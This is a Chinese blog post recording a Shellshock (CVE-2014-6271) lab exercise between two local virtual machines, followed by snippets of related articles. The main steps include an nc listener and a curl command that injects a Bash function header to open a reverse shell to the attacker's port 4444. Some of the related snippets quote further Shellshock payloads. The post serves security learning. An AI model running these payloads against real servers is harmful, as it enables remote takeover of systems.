破壳漏洞学习实验

最新推荐文章于 2024-06-11 20:16:00 发布
最新推荐文章于 2024-06-11 20:16:00 发布
阅读量2.1k 收藏 3
点赞数
文章标签: 破壳漏洞 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37659064/article/details/80094360
版权

今天在雪城大学的网络实验室学习了著名的破壳漏洞,下面分享一下对此漏洞进行的实战

  1. 首先在vbox中,我们将两台虚拟机设置为在同一局域网段,不知道如何设置局域网段?点击这里
  2. 然后我们在被攻击机上建立一个myprog.cgi的文件,在其中写入含有bash调用的代码
#!/bin/bash
echo "Content-type: text/plain"
echo
echo
echo "Hello World"

 3.将文件复制到/usr/lib/cgi-bin中并进行权限修改使得其能够被执行

4.我们可以通过另一台机器进行尝试访问,在我这里,被攻击机IP地址为10.0.2.5,攻击机IP地址为10.0.2.4,输入:http://10.0.2.5/cgi-bin/myprog.cgi可以看到,浏览器能够成功访问

5.下面,我们通过shell反弹来登录被攻击机,首先,进行nc监听

nc -lv 4444
6.新打开一个终端,输入 
curl -H 'x: () { :;}; /bin/bash -i >& /dev/tcp/攻击IP/4444 0>&1' http://被攻击IP/cgi-bin/myprog.cgi
7.效果如图,成功
littlebabyhhh
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Shellshock()系列漏洞简要分析及检测
Traxer的学习之路
03-13 4485
1.漏洞简介2.POC验证2.1 CVE 2014-6271最开始的shell测试脚本如下,主要的代码是第五行,它先使用env命令将() { :;}; echo vulnerable赋值给环境变量x,随后启动一个新的bash进程并执行命令echo test,并将错误信息重定向到null,再查找有无’vulnerable’这个字符串输出,如果输出成功则表示存在漏洞:#!/bin/bash EXITCO
CVE-2014-6271“漏洞利用过程
D-river博客
11-12 9102
前言CVE-2014-6271(即“漏洞)广泛存在与GNU Bash 版本小于等于4.3的*inux的系统之中,只要目标服务器开放着与Bash相交互的应用与服务,就有可能成功触发漏洞,获取目标系统当前Bash运行用户相同权限的shell接口。实验环境攻击机:kali linux 目标机: Ubuntu ip: 10.10.10.129漏洞验证 Bash版本小于等于4.3可能存在漏洞
CVE-2014-6271-bash shellshock-漏洞复现
m0_62008601的博客
08-06 2992
这些变量可以包含代码,在shell被调用后会被立即执行。用docker搭建vulhub漏洞靶场,服务启动后,有两个页面http://192.168.217.134:8080/victim.cgi和http://192.168.217.134:8080/safe.cgi。可以看到错误原因都是permission denied,那就是权限不足的原因了,那我们就修改一下权限,让它能够被访问。既然在victim.cgi可以执行命令,那么应该就可以进行反弹shell了,kali开启端口监听,执行反弹shell命令。.
漏洞复现」PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
最新发布
qq_39894062的博客
06-11 821
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
漏洞(CVE-2014-6271)综合分析
Star——Flying in the cyberspace
11-25 2941
目 录 一、 威胁卡片  二、 概述  三、 已知事件发布/披露情况 四、 漏洞的影响范围  五、 漏洞原理  六、 漏洞验证方法  七、 漏洞检测方法  八、 漏洞可能会带来的影响  九、 针对此漏洞的建议  十、 写在最后的啰嗦的话      一、     威胁卡片 二、概述        2014年9月24日Bash被公布存在远程代码执行漏洞,安天实验
漏洞实践
Unitue_逆流
03-14 1156
实验简介 实验所属系列:操作系统安全 预备知识 了解Bash Bash(GNU Bourne-Again Shell)是许多Linux平台的内定Shell,事实上,还有许多传统UNIX上用的Shell,像tcsh、csh、ash、bsh、ksh等 等,Shell Script大致都类同,当您学会一种Shell以后,其它的Shell会很快就上手,大多数的时候,一个Shell Script...
漏洞修复步骤
10-10
漏洞,又称为Shellshock漏洞,是一个严重的安全漏洞,影响了广泛使用的Bash shell。这个漏洞在2014年被发现,允许攻击者通过精心构造的环境变量注入恶意代码,从而控制受感染的系统。Bash是Unix和Linux系统中的...
漏洞最新linux补丁把谁4.3
10-08
漏洞(Shellshock)是2014年发现的一个严重的Linux和Unix系统安全漏洞,影响了广泛使用的Bash shell。Bash是GNU项目的一部分,是Linux和类Unix操作系统中的命令行解释器,用于处理用户输入的命令。这个漏洞允许...
Web扫描安全工具
08-01
一款用于扫描网站的安全工具,扫描并检测网站中存在的漏洞,该程序能检测SQL注入漏洞,跨网站脚本攻击漏洞等一系列网站漏洞
SUSE11.1漏洞补丁
10-09
SUSE11.1漏洞补丁 bash-3.2-147.20.1.x86_64.rpm
漏洞(ShellShock)官方修补补丁(2014.10.05)
10-13
修补了包括CVE-2014-6271(最原始的漏洞)、CVE-2014-7169、CVE-2014-7186、CVE-2014-7187、CVE-2014-6277和CVE-2014-6278。这些Bash漏洞现在都是漏洞集中的,目前所有补丁,截止2014.10.05的官方补丁已经...
linux 漏洞,Bash漏洞
weixin_42138376的博客
05-21 1126
”是一个严重漏洞的别名,在Red Hat、CentOS、Ubuntu、Fedora、Amazon Linux、OS X 10.10中均拥有存在CVE-2014-6271(即“漏洞)漏洞的Bash版本,同时由于Bash在各主流操作系统的广泛应用,此漏洞的影响范围包括但不限于大多数应用Bash的Unix、Linux、Mac OS X,而针对这些操作系统管理下的数据均存在高危威胁。漏洞的利用...
ShellShock(漏洞)的简单分析
热门推荐
爱唠叨的老鱼
09-27 1万+
(1)什么是ShellShock? (2)ShellShock漏洞的原理。 (3)ShellShock漏洞的危害。 (4)如何修复ShellShock漏洞
bash漏洞分析(一)
fly小灰灰的专栏
02-15 3832
1. 简介   bash远程代码执行漏洞,该漏洞会影响目前主流的Linux和Mac OSX操作系统平台,包括但不限于Redhat,CentOS,Ubuntu,Debian,Fedora,Amaron Linux,OSX10.10等平台。该漏洞可以通过构造环境变量的值来执行想要执行的攻击代码脚本,会影响到与bash交互的多种应用,包括HTTP,OpenSSH,DHCP等。    针对本次漏洞的检测,需
谈谈我是如何攻教务系统拿到CVE证书的
weixin_43815032的博客
02-20 3183
下面讲述的是学院学员拿到CVE证书的经历 学员名称:Polar_Peak 咳 咳~下面开始正式分享 —————————————————————————————————————— 某日,在别人都准备复习的时候,我默默打开学校门户系统 ...
Ubuntu 提权漏洞(CVE-2019-7304)复现
andiao1218的博客
02-28 1773
漏洞描述: Ubuntu 版本: Ubuntu 18.10 Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 LTS 2.28 < snapd < 2.37 会存在该漏洞 Poc Github:https://github.com/initstring/dirty_sock #1 注册并登陆,https:...
bash漏洞反弹shell
3569
07-29 4817
0x00 漏洞原理在bash里边输入~ export name='() { echo "inside name";}; echo "outside name";'查看环境变量~ env|grep name ~ name=() { echo "inside name";}; echo "outside name";这时你会发现当进入子shell的时候,直接输出 outside name~ bas
经典CVE:漏洞
zh的博客
10-14 240
靶场地址:http://www.whalwl.site:8029/ 解题准备:CVE编号:CVE-2014-6271 解题思路: 1、点击靶场主页的poc.cgi进行抓包,修改User-Agent: User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /bin/ls / 2、成功执行后,即可发现flag文件 3、继续查看flag ...
(shellshock)漏洞的一些汇总
瞎几把学
12-07 1519
原理与基本情况不再赘述 一、shellshock存在的环境 一个攻击者能够控制的环境变量,特别是该变量以 () { 开始。必须调用bash系统必须存在bash漏洞 二、目前证实适用的一些场景; CGI-based web server CGI处理文档请求的时候,使用环境变量处理请求,如果处理使用bash脚本,或者使用了系统调用,bash将接受系统变量并进行

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值